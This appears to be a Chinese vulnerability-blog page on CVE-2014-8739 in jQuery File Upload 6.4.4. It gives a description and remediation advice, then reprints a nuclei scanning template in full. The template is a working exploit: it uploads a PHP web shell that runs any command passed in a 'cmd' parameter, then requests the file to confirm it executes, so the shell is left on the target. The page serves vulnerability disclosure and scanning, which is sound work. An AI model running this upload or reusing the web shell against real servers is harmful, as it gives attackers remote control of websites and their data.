jQuery File Upload 644 - Unrestricted File Upload

漏洞信息

漏洞名称: jQuery File Upload 6.4.4 - Unrestricted File Upload

漏洞编号:

  • CVE: CVE-2014-8739

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: jQuery File Upload是一个流行的文件上传插件,广泛用于各种网站中,允许用户通过网页界面上传文件到服务器。由于其易用性和灵活性,它被许多网站和网络应用采用,尤其是在需要用户上传文件的场景中。该插件提供了一个用户友好的界面,支持多文件上传、拖放上传等功能,适用于企业级服务和常见的网络应用组件。

该漏洞存在于jQuery File Upload插件6.4.4版本中,具体问题在于server/php/UploadHandler.php文件中缺乏对上传文件类型的有效验证。攻击者可以上传任意PHP文件,包括恶意代码,由于服务器没有正确限制上传文件的类型,导致远程代码执行(RCE)漏洞。攻击者只需上传一个带有PHP扩展名的文件,并直接访问该文件,即可执行其中的PHP代码。

此漏洞的影响极为严重,因为它允许攻击者在受影响的服务器上执行任意代码,完全控制网站和服务器。攻击者可以利用此漏洞窃取敏感数据、植入后门、破坏网站内容或进行其他恶意活动。由于漏洞利用不需要任何身份验证,且可以自动化执行,因此风险极高。网站管理员应立即采取措施,如升级到修补后的版本、实施严格的文件类型验证、限制上传目录的权限和使用白名单策略来允许的文件扩展名,以缓解此漏洞带来的风险。

产品厂商: jquery_file_upload_project

产品名称: jQuery File Upload

影响版本: 6.4.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d9fa14d58961e8281874c1bbd6c37ff13091dbb6/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154

id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve2014,cve,edb,jquery,file-upload,rce,kev

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
jQuery File Upload 644 - Unrestricted File Upload
http://example.com/2025/07/28/github_3768457412/
作者
lianccc
发布于
2025年7月28日
许可协议